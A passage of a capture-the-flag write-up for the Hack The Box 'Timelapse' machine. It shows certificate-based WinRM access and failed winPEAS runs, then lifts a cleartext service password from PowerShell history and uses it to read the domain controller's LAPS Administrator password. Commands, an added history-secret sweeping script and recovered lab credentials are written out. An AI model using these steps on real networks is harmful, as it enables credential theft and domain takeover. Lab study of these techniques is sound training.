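    $eku = ($cert.Extensions | Where-Object { $_.Oid.Value -eq '2.5.29.37' } |
            ForEach-Object { $_.Format($false) }) -join ';'
    # 2.5.29.17 = Subject Alternative Name; the "Principal Name=" entry is the UPN
    $san = ($cert.Extensions | Where-Object { $_.Oid.Value -eq '2.5.29.17' } |
            ForEach-Object { $_.Format($false) }) -join ';'
    $upn = if ($san -match 'Principal Name=([^,;\s]+)') { $Matches[1] } else { $null }

    [pscustomobject]@{
        Subject       = $cert.Subject
        Issuer        = $cert.Issuer
        NotAfter      = $cert.NotAfter
        HasClientAuth = [bool]($eku -match '1\.3\.6\.1\.5\.5\.7\.3\.2')
        UPN           = $upn            # account the cert will be mapped to (if a mapping exists)
        Thumbprint    = $cert.Thumbprint
    }
}

# --- demo with a constructed certificate (assumed UPN; point at the real .crt to inspect that) ---
$demo = New-SelfSignedCertificate -Subject 'CN=legacyy' -CertStoreLocation 'Cert:\CurrentUser\My' `
    -TextExtension @('2.5.29.37={text}1.3.6.1.5.5.7.3.2', '2.5.29.17={text}upn=legacyy@timelapse.htb')
$certPath = Join-Path $env:TEMP 'demo-client.cer'
Export-Certificate -Cert $demo -FilePath $certPath | Out-Null

Get-WinRmClientCertInfo -CertPath $certPath | Format-List

# remove the throwaway certificate again
Remove-Item -Path "Cert:\CurrentUser\My\$($demo.Thumbprint)"
Remove-Item -Path $certPath
```

When a certificate you have found refuses to log in, HasClientAuth and UPN are the two fields to compare against the server's mapping (Get-ChildItem WSMan:\localhost\ClientCertificate on the target); a certificate without the Client Authentication EKU is rejected regardless of its subject.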

*Evil-WinRM* PS C:\Users\legacyy\Documents> cd ../
*Evil-WinRM* PS C:\Users\legacyy> ls


    Directory: C:\Users\legacyy


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---       10/25/2021   8:25 AM                Desktop
d-r---       10/25/2021   8:22 AM                Documents
d-r---        9/15/2018  12:19 AM                Downloads
d-r---        9/15/2018  12:19 AM                Favorites
d-r---        9/15/2018  12:19 AM                Links
d-r---        9/15/2018  12:19 AM                Music
d-r---        9/15/2018  12:19 AM                Pictures
d-----        9/15/2018  12:19 AM                Saved Games
d-r---        9/15/2018  12:19 AM                Videos


*Evil-WinRM* PS C:\Users\legacyy> cd Desktop
*Evil-WinRM* PS C:\Users\legacyy\Desktop> ls


    Directory: C:\Users\legacyy\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        9/14/2023   1:08 PM             34 user.txt


*Evil-WinRM* PS C:\Users\legacyy\Desktop> cat user.txt
b4d108259211b472c1f480aecdaf68d4

Privesc

We will try to load the PowerShell module we found earlier (AdmPwd.PS, the client module for LAPS, Microsoft's Local Administrator Password Solution):

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ cd WindowsPowershell 
                                                                                                        
┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell]
└─$ ls
v1.0
                                                                                                        
┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell]
└─$ cd v1.0             
                                                                                                        
┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell/v1.0]
└─$ ls
Modules
                                                                                                        
┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell/v1.0]
└─$ cd Modules 
                                                                                                        
┌──(kali㉿kali)-[~/…/timelapse/WindowsPowershell/v1.0/Modules]
└─$ ls
AdmPwd.PS
                                                                                                        
┌──(kali㉿kali)-[~/…/timelapse/WindowsPowershell/v1.0/Modules]
└─$ cd AdmPwd.PS 
                                                                                                        
┌──(kali㉿kali)-[~/…/WindowsPowershell/v1.0/Modules/AdmPwd.PS]
└─$ ls
AdmPwd.PS.dll  AdmPwd.PS.format.ps1xml  AdmPwd.PS.psd1  AdmPwd.Utils.dll  en-US
                                                                                                        
┌──(kali㉿kali)-[~/…/WindowsPowershell/v1.0/Modules/AdmPwd.PS]
└─$ 

We upload the module directory to the Windows machine with evil-winrm's built-in upload command:

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> upload /home/kali/HTB/timelapse/AdmPwd.PS
                                        
Info: Uploading /home/kali/HTB/timelapse/AdmPwd.PS to C:\Users\legacyy\Documents\AdmPwd.PS
                                        
Data: 42372 bytes of 42372 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\legacyy\Documents> ls


    Directory: C:\Users\legacyy\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/14/2023   4:03 PM                AdmPwd.PS


*Evil-WinRM* PS C:\Users\legacyy\Documents> cd AAdmPwd.PS
Cannot find path 'C:\Users\legacyy\Documents\AAdmPwd.PS' because it does not exist.
At line:1 char:1
+ cd AAdmPwd.PS
+ ~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Users\legacyy\Documents\AAdmPwd.PS:String) [Set-Location], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.SetLocationCommand
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd AdmPwd.PS

In a fresh session: Import-Module on the manifest succeeds silently, Get-Content fails because the manifest lives in the AdmPwd.PS subdirectory, and the two DLLs load with [Reflection.Assembly]::LoadFile (not actually required, since the manifest's ModuleToProcess already loads AdmPwd.PS.dll when the module is imported):

└─$ evil-winrm -S -i 10.10.11.152 -u legaccy -c /home/kali/HTB/timelapse/certificate.crt -k /home/kali/HTB/timelapse/privatekey.pem
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> ls


    Directory: C:\Users\legacyy\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/14/2023   4:03 PM                AdmPwd.PS


*Evil-WinRM* PS C:\Users\legacyy\Documents> Import-Module C:\Users\legacyy\Documents\AdmPwd.PS\AdmPwd.PS.psd1

*Evil-WinRM* PS C:\Users\legacyy\Documents> 
*Evil-WinRM* PS C:\Users\legacyy\Documents> Get-Content AdmPwd.PS.psd1
Cannot find path 'C:\Users\legacyy\Documents\AdmPwd.PS.psd1' because it does not exist.
At line:1 char:1
+ Get-Content AdmPwd.PS.psd1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Users\legacy...\AdmPwd.PS.psd1:String) [Get-Content], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\legacyy\Documents> [Reflection.Assembly]::LoadFile("C:\Users\legacyy\Documents\AdmPwd.PS\AdmPwd.PS.dll")
Enter PEM pass phrase:
Enter PEM pass phrase:

GAC    Version        Location
---    -------        --------
False  v4.0.30319     C:\Users\legacyy\Documents\AdmPwd.PS\AdmPwd.PS.dll


*Evil-WinRM* PS C:\Users\legacyy\Documents> [Reflection.Assembly]::LoadFile("C:\Users\legacyy\Documents\AdmPwd.PS\AdmPwd.Utils.dll")
Enter PEM pass phrase:

GAC    Version        Location
---    -------        --------
False  v4.0.30319     C:\Users\legacyy\Documents\AdmPwd.PS\AdmPwd.Utils.dll


*Evil-WinRM* PS C:\Users\legacyy\Documents> Import-Module C:\Users\legacyy\Documents\AdmPwd.PS\AdmPwd.PS.psd1
*Evil-WinRM* PS C:\Users\legacyy\Documents> Get-Content AdmPwd.PS.psd1
Enter PEM pass phrase:
Cannot find path 'C:\Users\legacyy\Documents\AdmPwd.PS.psd1' because it does not exist.
At line:1 char:1
+ Get-Content AdmPwd.PS.psd1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Users\legacy...\AdmPwd.PS.psd1:String) [Get-Content], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\legacyy\Documents> Get-Content C:\Users\legacyy\Documents\AdmPwd.PS\AdmPwd.PS.psd1
Enter PEM pass phrase:
#
# Module manifest for module 'AdmPwd.PS'
#
# Generated by: Jiri Formacek - MSFT
#
# Generated on: 3.12.2012
#


@{

# Script module or binary module file associated with this manifest
ModuleToProcess = '.\AdmPwd.PS.dll'

# Version number of this module.
ModuleVersion = '5.0.0.0'

# ID used to uniquely identify this module
GUID = '11869C0C-4440-4560-AA89-9EEF0C0224FA'

# Author of this module
Author = 'Jiri Formacek - MSFT'

# Company or vendor of this module
CompanyName = 'Microsoft | Services'

# Copyright statement for this module
Copyright = ''

# Description of the functionality provided by this module
Description = 'Provides cmdlets for configuration and usage of Local admin password management solution'

# Minimum version of the Windows PowerShell engine required by this module
PowerShellVersion = ''

# Name of the Windows PowerShell host required by this module
PowerShellHostName = ''

# Minimum version of the Windows PowerShell host required by this module
PowerShellHostVersion = ''

# Minimum version of the .NET Framework required by this module
DotNetFrameworkVersion = ''

# Minimum version of the common language runtime (CLR) required by this module
CLRVersion = ''

# Processor architecture (None, X86, Amd64, IA64) required by this module
ProcessorArchitecture = ''

# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @()

# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = @()

# Script files (.ps1) that are run in the caller's environment prior to importing this module
ScriptsToProcess = @()

# Type files (.ps1xml) to be loaded when importing this module
TypesToProcess = @()

# Format files (.ps1xml) to be loaded when importing this module
FormatsToProcess = @('AdmPwd.PS.format.ps1xml')

# Modules to import as nested modules of the module specified in ModuleToProcess
NestedModules = @()

# Functions to export from this module
FunctionsToExport = ''

# Cmdlets to export from this module
CmdletsToExport = '*'

# Variables to export from this module
VariablesToExport = '*'

# Aliases to export from this module
AliasesToExport = '*'

# List of all modules packaged with this module
ModuleList = @()

# List of all files packaged with this module
FileList = @('AdmPwd.PS.dll','AdmPwd.Utils.dll','AdmPwd.PS.format.ps1xml')

# Private data to pass to the module specified in ModuleToProcess
PrivateData = ''

}

To list the cmdlets the module exports (again a ChatGPT suggestion): Get-Command -Module 'AdmPwd.PS'

*Evil-WinRM* PS C:\Users\legacyy\Documents\AdmPwd.PS> Get-Command -Module 'AdmPwd.PS'
Enter PEM pass phrase:

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Cmdlet          Find-AdmPwdExtendedRights                          5.0.0.0    AdmPwd.PS
Cmdlet          Get-AdmPwdPassword                                 5.0.0.0    AdmPwd.PS
Cmdlet          Reset-AdmPwdPassword                               5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdAuditing                                 5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdComputerSelfPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdReadPasswordPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdResetPasswordPermission                  5.0.0.0    AdmPwd.PS
Cmdlet          Update-AdmPwdADSchema                              5.0.0.0    AdmPwd.PS

Next, Get-AdmPwdPassword. Called without arguments it returns nothing, so we pass the computer name:

Get-AdmPwdPassword -ComputerName DC01


*Evil-WinRM* PS C:\Users\legacyy\Documents> Get-AdmPwdPassword -ComputerName DC01

Enter PEM pass phrase:
Enter PEM pass phrase:

ComputerName         DistinguishedName                             Password           ExpirationTimestamp
------------         -----------------                             --------           -------------------
DC01                 CN=DC01,OU=Domain Controllers,DC=timelapse...                    9/19/2023 1:08:21 PM


*Evil-WinRM* PS C:\Users\legacyy\Documents> 


No luck with this approach as legacyy: the cmdlet finds the DC01 computer object and even returns its ExpirationTimestamp, but the Password column is empty. LAPS stores the password in the confidential ms-Mcs-AdmPwd attribute, and the DC only returns that attribute to principals granted the extended right to read it; legacyy has not been granted it, so the query succeeds while the attribute is withheld.

I will try winPEAS instead.

First upload it to the machine:

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ evil-winrm -S -i 10.10.11.152 -u legaccy -c /home/kali/HTB/timelapse/certificate.crt -k /home/kali/HTB/timelapse/
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplement
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> upload /home/kali/HTB/timelapse/winPEASx64.exe`
                                        
Info: Uploading /home/kali/HTB/timelapse/winPEASx64.exe to C:\Users\legacyy\Documents\winPEASx64.exe
Enter PEM pass phrase:
                                        
Data: 3183956 bytes of 3183956 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\legacyy\Documents> 

Running winPEAS fails: Defender flags the binary and quarantines it, so the second attempt fails with "not recognized" because the file is gone (ls shows an empty directory). Set-ExecutionPolicy has no effect here; it only governs scripts, not executables. So I upload it again.

*Evil-WinRM* PS C:\Users\legacyy\Documents> ./winPEASx64.exe
Enter PEM pass phrase:
Program 'winPEASx64.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted software
At line:1 char:1
+ ./winPEASx64.exe
+ ~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed
*Evil-WinRM* PS C:\Users\legacyy\Documents> Set-ExecutionPolicy Bypass -Scope Process -Force
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> ./winPEASx64.exe
Enter PEM pass phrase:
The term './winPEASx64.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ ./winPEASx64.exe
+ ~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (./winPEASx64.exe:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\legacyy\Documents> Get-ChildItem -Path . -Filter winPEASx64.exe
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> ls
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> ls
*Evil-WinRM* PS C:\Users\legacyy\Documents> upload winPEASx64.exe


Uploaded the winPEAS EXE and the PowerShell version, Invoke-winPEAS.ps1, which ships with PowerShell Empire on Kali:

┌──(kali㉿kali)-[~/Downloads/x64]
└─$ locate winPEAS
/home/kali/Downloads/winPEASx64.exe
/home/kali/Downloads/winPEASx86.exe
/home/kali/HTB/Sauna/winPEASx64.exe
/home/kali/HTB/timelapse/winPEASx64.exe
/usr/share/powershell-empire/empire/server/data/module_source/privesc/Invoke-winPEAS.ps1
/usr/share/powershell-empire/empire/server/modules/powershell/privesc/winPEAS.yaml
                                                                                                                     
┌──(kali㉿kali)-[~/Downloads/x64]
└─$ cd /usr/share/powershell-empire/empire/server/data/module_source/privesc/ 
                                                                                                                     
┌──(kali㉿kali)-[/usr/…/server/data/module_source/privesc]
└─$ cpInvoke-winPEAS.ps1 ~/HTB/timelapse                                     
cpInvoke-winPEAS.ps1: command not found
                                                                                                                     
┌──(kali㉿kali)-[/usr/…/server/data/module_source/privesc]
└─$ cp Invoke-winPEAS.ps1 ~/HTB/timelapse
                                                                                                                     
┌──(kali㉿kali)-[/usr/…/server/data/module_source/privesc]
└─$ 

Then run the following steps in the evil-winrm session:

Set-ExecutionPolicy Bypass -Scope Process -Force
. .\Invoke-winPEAS.ps1
Invoke-winPEAS

Blocked by antivirus again. The ScriptContainedMaliciousContent error comes from AMSI scanning the script content as PowerShell parses it, which is why Set-ExecutionPolicy does not help and why the Invoke-winPEAS function is never defined:

*Evil-WinRM* PS C:\Users\legacyy\Documents> Set-ExecutionPolicy Bypass -Scope Process -Force
*Evil-WinRM* PS C:\Users\legacyy\Documents> . .\Invoke-winPEAS.ps1
At C:\Users\legacyy\Documents\Invoke-winPEAS.ps1:1 char:1
+ function Invoke-winPEAS
+ ~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At C:\Users\legacyy\Documents\Invoke-winPEAS.ps1:1 char:1
+ function Invoke-winPEAS
+ ~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent
*Evil-WinRM* PS C:\Users\legacyy\Documents> ls


    Directory: C:\Users\legacyy\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/15/2023   4:56 AM         941879 Invoke-winPEAS.ps1
-a----        9/15/2023   4:51 AM        2367796 winPEASx64.exe


*Evil-WinRM* PS C:\Users\legacyy\Documents> Invoke-winPEAS
The term 'Invoke-winPEAS' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ Invoke-winPEAS
+ ~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Invoke-winPEAS:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\legacyy\Documents> 

After some research, create a .bat wrapper that launches the script through a fresh powershell.exe, then upload and run it alongside the other files:

└─$ cat runWinPEAS.bat 
@echo off
powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File "C:\Users\legacyy\Documents\Invoke-winPEAS.ps1"
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ 

This fails the same way: the wrapper only changes how powershell.exe is started, and AMSI still scans Invoke-winPEAS.ps1 when it is parsed.

*Evil-WinRM* PS C:\Users\legacyy\Documents> ;s
The term 's' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:2
+ ;s
+  ~
    + CategoryInfo          : ObjectNotFound: (s:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\legacyy\Documents> ls


    Directory: C:\Users\legacyy\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/15/2023   4:56 AM         941879 Invoke-winPEAS.ps1
-a----        9/15/2023   5:03 AM            134 runWinPEAS.bat
-a----        9/15/2023   4:51 AM        2367796 winPEASx64.exe


*Evil-WinRM* PS C:\Users\legacyy\Documents> ./runWinPEAS.bat
runWinPEAS.bat : At C:\Users\legacyy\Documents\Invoke-winPEAS.ps1:1 char:1
    + CategoryInfo          : NotSpecified: (At C:\Users\leg...AS.ps1:1 char:1:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
+ function Invoke-winPEAS
+ ~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent
*Evil-WinRM* PS C:\Users\legacyy\Documents>

Downloaded winPEAS.bat from https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASbat

Uploaded it and tried to run it.

It ran and crashed, but gave the following output first. A common cause of the "cannot find the batch label specified" errors is a .bat saved with Unix (LF) line endings, which cmd's label search does not handle; converting the file to CRLF (unix2dos) before uploading avoids it.

*Evil-WinRM* PS C:\Users\legacyy\Documents> ./winPEAS.bat
winPEAS.bat : The system cannot find the batch label specified - SetOnce
    + CategoryInfo          : NotSpecified: (The system cann...ified - SetOnce:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

The system cannot find the batch label specified - ColorLine
The system cannot find the batch label specified - ColorLine
The system cannot find the batch label specified - ColorLine
PowerShell v2 Version:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine
    PowerShellVersion    REG_SZ    2.0

PowerShell v5 Version:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine
    PowerShellVersion    REG_SZ    5.1.17763.1

Transcriptions Settings:
Module logging settings:
Scriptblog logging settings:

PS default transcript history

Checking PS history file
 Volume in drive C has no label.
 Volume Serial Number is 22CC-AE66

 Directory of C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine

03/04/2022  12:46 AM               434 ConsoleHost_history.txt
               1 File(s)            434 bytes
               0 Dir(s)   6,800,072,704 bytes free

The system cannot find the batch label specified - T_Progress
******  B A T C H   R E C U R S I O N  exceeds STACK limits ******
Recursion Count=344, Stack Usage=90 percent
******       B A T C H   PROCESSING IS   A B O R T E D

The interesting item is ConsoleHost_history.txt in C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine: PSReadLine records every command typed in an interactive PowerShell session, secrets included. We fetch it with evil-winrm's download command:

*Evil-WinRM* PS C:\Users\legacyy\Documents> cd C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> ls


    Directory: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         3/3/2022  11:46 PM            434 ConsoleHost_history.txt


*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> download ConsoleHost_history.txt
                                        
Info: Downloading C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt to ConsoleHost_history.txt                                                                                             
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> 

We check the file:

└─$ cat ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
                                                                                                                             
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ 

Username svc_deploy and password E3R$Q62^12p7PLlC%KWaxuaV, typed in clear into ConvertTo-SecureString. Plain evil-winrm (HTTP) did not work, but with -S it did; the history itself shows the same host being reached over WinRM on 5986 with -usessl:
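The history file is the whole privilege escalation, so it is worth generalising. The function below is an added example, not code from the writeup: it sweeps every readable PSReadLine history on the host for lines that embed credentials, the way this one embedded svc_deploy's. The default path is PSReadLine's real location; the patterns and the function name are mine, and the demo history written to %TEMP% is constructed, with a made-up password.

```powershell
# Added example, not from the original writeup.
# Hunt PSReadLine history files for lines that carry credentials in clear.

function Find-SecretsInPSHistory {
    param(
        # default: every profile's history the current account can read (PSReadLine's real default path)
        [string[]]$Path = (Get-ChildItem 'C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt' -ErrorAction SilentlyContinue).FullName
    )
    # patterns that usually mean a secret was typed as a literal
    $patterns = @(
        'ConvertTo-SecureString\s+[''"][^''"]+[''"]\s+-AsPlainText',   # SecureString built from a literal
        'PSCredential\s*\(',                                          # PSCredential with inline arguments
        '(?i)(?:^|\s)(?:-p|--password|-password)\s+\S+',              # common CLI password switches
        '(?i)/p:\S+',                                                 # schtasks/cmdkey style /p:
        '(?i)net\s+user\s+\S+\s+\S+',                                 # net user <name> <password>
        '(?i)(?:api[_-]?key|secret|token)\s*[:=]\s*\S+'
    )
    foreach ($file in $Path) {
        if (-not $file -or -not (Test-Path -Path $file)) { continue }
        $lineNo = 0
        foreach ($line in Get-Content -Path $file) {
            $lineNo++
            foreach ($p in $patterns) {
                if ($line -match $p) {
                    [pscustomobject]@{ File = $file; Line = $lineNo; Pattern = $p; Text = $line.Trim() }
                    break   # one hit per line is enough
                }
            }
        }
    }
}

# --- demo on a constructed history file (same shape as the one found above, fake password) ---
$demoFile = Join-Path $env:TEMP 'ConsoleHost_history.txt'
@'
whoami
ipconfig /all
$p = ConvertTo-SecureString 'NotTheRealOne123!' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_demo', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -scriptblock {whoami}
get-aduser -filter * -properties *
'@ | Set-Content -Path $demoFile

Find-SecretsInPSHistory -Path $demoFile | Format-Table -AutoSize   # reports lines 3 and 4
Remove-Item -Path $demoFile
```

Run without -Path from an account that can read other profiles, it covers every user on the box in one pass. Defensively, this file is what to clear after typing a secret interactively, or prevent with Set-PSReadLineOption -HistorySaveStyle SaveNothing, or filter with -AddToHistoryHandler so lines matching these patterns are never written.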

└─$ evil-winrm -S -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> 

Upload the AdmPwd.PS module again as this user and import it:

Import-Module C:\Users\svc_deploy\Documents\AdmPwd.PS\AdmPwd.PS.psd1

*Evil-WinRM* PS C:\Users\svc_deploy\Documents\AdmPwd.PS> Get-Command -Module 'AdmPwd.PS'

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Cmdlet          Find-AdmPwdExtendedRights                          5.0.0.0    AdmPwd.PS
Cmdlet          Get-AdmPwdPassword                                 5.0.0.0    AdmPwd.PS
Cmdlet          Reset-AdmPwdPassword                               5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdAuditing                                 5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdComputerSelfPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdReadPasswordPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdResetPasswordPermission                  5.0.0.0    AdmPwd.PS
Cmdlet          Update-AdmPwdADSchema                              5.0.0.0    AdmPwd.PS

We run Get-AdmPwdPassword again, this time as svc_deploy:

*Evil-WinRM* PS C:\Users\svc_deploy\Documents\AdmPwd.PS> Get-AdmPwdPassword -ComputerName DC01


ComputerName         DistinguishedName                             Password           ExpirationTimestamp
------------         -----------------                             --------           -------------------
DC01                 CN=DC01,OU=Domain Controllers,DC=timelapse... x6N4C+9O88}}#mN... 9/20/2023 3:40:41 AM


*Evil-WinRM* PS C:\Users\svc_deploy\Documents\AdmPwd.PS> 
*Evil-WinRM* PS C:\Users\svc_deploy\Documents\AdmPwd.PS> 

The Password column is truncated, so pipe to Format-List: Get-AdmPwdPassword -ComputerName DC01 | Format-List

*Evil-WinRM* PS C:\Users\svc_deploy\Documents\AdmPwd.PS> Get-AdmPwdPassword -ComputerName DC01 | Format-List


ComputerName        : DC01
DistinguishedName   : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
Password            : x6N4C+9O88}}#mN4Tirl43/o
ExpirationTimestamp : 9/20/2023 3:40:41 AM

This is the LAPS-managed password for the built-in Administrator account on DC01, and on a domain controller that account is the domain Administrator. Log in with it: evil-winrm -S -i 10.10.11.152 -u administrator -p 'x6N4C+9O88}}#mN4Tirl43/o', remembering the -S switch (without it the connection fails). That works and gives an Administrator shell, but root.txt is not where expected:

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ evil-winrm -S -i 10.10.11.152 -u administrator -p 'x6N4C+9O88}}#mN4Tirl43/o'

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../
*Evil-WinRM* PS C:\Users\Administrator> ls


    Directory: C:\Users\Administrator


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---       10/23/2021  11:27 AM                3D Objects
d-r---       10/23/2021  11:27 AM                Contacts
d-r---         3/3/2022   7:48 PM                Desktop
d-r---       10/23/2021  12:22 PM                Documents
d-r---       10/25/2021   2:06 PM                Downloads
d-r---       10/23/2021  11:27 AM                Favorites
d-r---       10/23/2021  11:28 AM                Links
d-r---       10/23/2021  11:27 AM                Music
d-r---       10/23/2021  11:27 AM                Pictures
d-r---       10/23/2021  11:27 AM                Saved Games
d-r---       10/23/2021  11:27 AM                Searches
d-r---       10/23/2021  11:27 AM                Videos


*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls -Recurse | ? { $_.Name -eq 'root.txt' }

*Evil-WinRM* PS C:\Users\Administrator\Desktop> 
*Evil-WinRM* PS C:\Users\Administrator\Desktop> 

I restarted the machine and tried again; after the reboot the Administrator login no longer works.

